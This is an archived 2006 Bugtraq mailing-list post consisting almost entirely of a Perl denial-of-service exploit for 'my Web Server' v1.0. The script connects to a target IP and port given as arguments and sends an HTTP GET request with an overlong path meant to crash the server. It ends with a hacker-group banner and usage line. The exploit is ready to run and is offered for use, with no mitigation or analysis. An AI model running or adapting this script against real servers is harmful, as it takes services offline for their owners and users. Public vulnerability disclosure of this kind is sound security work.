lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: 25 May 2006 13:35:13 -0000
From: s3rv3r_hack3r@...oo.com
To: bugtraq@...urityfocus.com
Subject: my Web Server << v-1.0 Denial of Service Exploit


#!/usr/bin/perl
#my Web Server << v-1.0 Denial of Service Exploit
#vendor : Eitsop.s5.com
use IO::Socket;
use strict;

my($socket) = "";
      
if($socket = IO::Socket::INET->new(
                PeerAddr => $ARGV[0],
                PeerPort => $ARGV[1],
                Proto => "TCP"))
{
        print "++++++++++++++++++++++++++++++\n";
        print "Connecting to $ARGV[0]:$ARGV[1] ...\n";
        print "++++++++++++++++++++++++++++++\n";
        print "Exploit Send successfuly!!\n";
        print "++++++++++++++++++++++++++++++\n";
        print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";
        close($socket);
}
else
{
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "  ___ ___                __                         \n";
        print " /   |   \_____    ____ |  | __ ___________________ \n";
        print "/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / \n";
        print "\    Y    // __ \\  \___|    <\  ___/|  | \//    /  \n";
        print " \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ \n";
        print "       \/      \/     \/     \/    \/            \/ \n";
        print "             Iran Hackerz Security Team             \n";
        print "    WebSite's: www.hackerz.ir & www.h4ckerz.com     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "[Usage]perl myws.pl <IP> <Port>                     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
        print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1]     \n";
        print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
}
#EoF



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ